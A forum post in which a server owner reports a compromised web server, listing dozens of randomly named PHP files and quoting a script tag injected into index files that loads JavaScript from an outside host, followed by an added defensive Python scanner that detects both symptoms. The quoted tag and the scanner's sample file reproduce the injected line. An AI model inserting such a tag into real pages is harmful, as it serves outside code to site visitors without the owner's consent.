So apparently my server kinda got hacked. I don't think that someone got access to the root user or any other user, but in every main directory of the www-data user there were a lot of weird files.
Files like these:
09pr830b.php 52uhp5j9.php 9hjbz7xu.php bdeaduyl.php hhj7on2v.php jm7n1zdf.php lw3lv13h.php nzj3wf6h.php r5qp67kw.php x6ehtntu.php 0y9gi471.php 5536w191.php 9vmwh7aa.php e2papru4.php hzmnb75x.php jme7u409.php orc8p82a.php ra14sbdz.php uis5zhq2.php xnqcqm3d.php 158d9hzv.php 5k2x6uh1.php c15b02bz.php e6ykc6n0.php i1sc5ikc.php jn76fivm.php mb3w53e9.php ox26z4hn.php rcwj3dkx.php umhzgkbh.php xoodj3hs.php 2b1vzzo7.php 5mzdj4r3.php a7kwdelx.php c9shlse9.php eak7qcei.php i9f2cyhu.php jp62feoo.php mcp2njev.php p0dfud9d.php xs2g1nc8.php 2d0x8ec5.php 6s88dqcm.php a9tqjna5.php c9tfpu8d.php ed17zccq.php iahr5b8k.php jrtaolcc.php p0ntclmm.php xtlog640.php 2gqt4ol7.php 6s89iw0b.php en539hql.php igtvj6vh.php ko3l8s4u.php picg4k2r.php rk2yi0zl.php utajrsov.php yc5w8otp.php 2lh94d56.php 71zw0l85.php cn7d5i9a.php eok7yfj2.php kps5qctg.php prvpb4vg.php veceocp0.php z0yyxgtw.php 2wvhyz4c.php 79vq53ml.php apv62qn8.php co8c22wm.php f7yo0qfw.php kpu3xi71.php mwksuipa.php ptu6md0l.php sg6sk7we.php vg6mqofk.php z25w3zq9.php 3axgnqdb.php 7e0249wk.php cpy4xvrl.php fyospouz.php j3u65l0i.php kzikyhq5.php ndv1twur.php q4vs0pfe.php svmlp5n8.php vr71dbz8.php zjcinm40.php 3nkos6a4.php 7xka8fu3.php awrnmp7p.php cw6ibtrt.php g4oxsofs.php j706xx73.php l8j3k01f.php noldizm7.php q5l61p21.php t0ewh25s.php vzxso84f.php zssdhx3d.php 3w8veomm.php 8x6qv1tl.php aze5jtlk.php de9kfywx.php j9umstng.php q9oudc57.php u9s7v60e.php wi54c5sc.php 470dae43.php 902deir8.php b4aogx06.php gk9moupj.php jeet447u.php npm72nuo.php qbd1c67k.php uar9q55s.php wn17yctf.php 4uwk3yz6.php 90kpxfeq.php dq7tefm3.php jepw041c.php lv8r524n.php ntnl0am3.php qvgy3407.php ucwog9rb.php
There are a couple of WordPress instances in each webspace. But even in the webspaces where there wasn't a WordPress instance installed, those files were there...
Also, at the beginning of every index.html or index.php there was always an entry like this:
<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'>
I don't know if those were 2 separate hacks or just a single one, but I would really like to know what mistakes I could have been making for this to happen.
Hope someone can help me here.
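
Added example, not part of the original post: a read-only triage scan for the two symptoms described above, namely directories holding several `.php` files with 8-character random-looking names, and index files that reference the quoted script host near the top. The function names, the `min_cluster` threshold, the `head_bytes` window and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Name shape of the files listed in the post: 8 chars of [a-z0-9] plus ".php".
RANDOM_PHP = re.compile(r"^[a-z0-9]{8}\.php$")
# Host from the script tag quoted in the post.
INJECTED_HOST = b"snippet.adsformarket.com"
INDEX_NAMES = {"index.php", "index.html"}


def scan_webroot(root, min_cluster=3, head_bytes=4096):
    """Return (clusters, injected): directories holding at least min_cluster
    random-looking .php names, and index files whose first head_bytes
    reference INJECTED_HOST. Hits are candidates for review, not verdicts;
    min_cluster and head_bytes are assumed defaults."""
    clusters, injected = {}, []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        hits = sorted(f for f in files if RANDOM_PHP.match(f))
        if len(hits) >= min_cluster:
            clusters[rel_dir] = hits
        for name in INDEX_NAMES.intersection(files):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(head_bytes)
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if INJECTED_HOST in head:
                injected.append(os.path.join(rel_dir, name))
    return clusters, sorted(injected)


def build_sample_tree(root):
    """Constructed sample: site_a shows both symptoms, site_b is clean."""
    tag = b"<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'>\n"
    layout = {
        "site_a/index.php": tag + b"<?php // page ?>",
        "site_a/09pr830b.php": b"", "site_a/52uhp5j9.php": b"",
        "site_a/9hjbz7xu.php": b"",
        "site_b/index.html": b"<html></html>",
        "site_b/settings.php": b"",  # legitimate 8-letter name, below threshold
    }
    for rel, data in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
```

Legitimate files whose names happen to be eight lowercase characters (such as `settings.php`) match the name pattern too, which is why the scan reports clusters rather than single files; lower `min_cluster` to 1 to list every match for manual review.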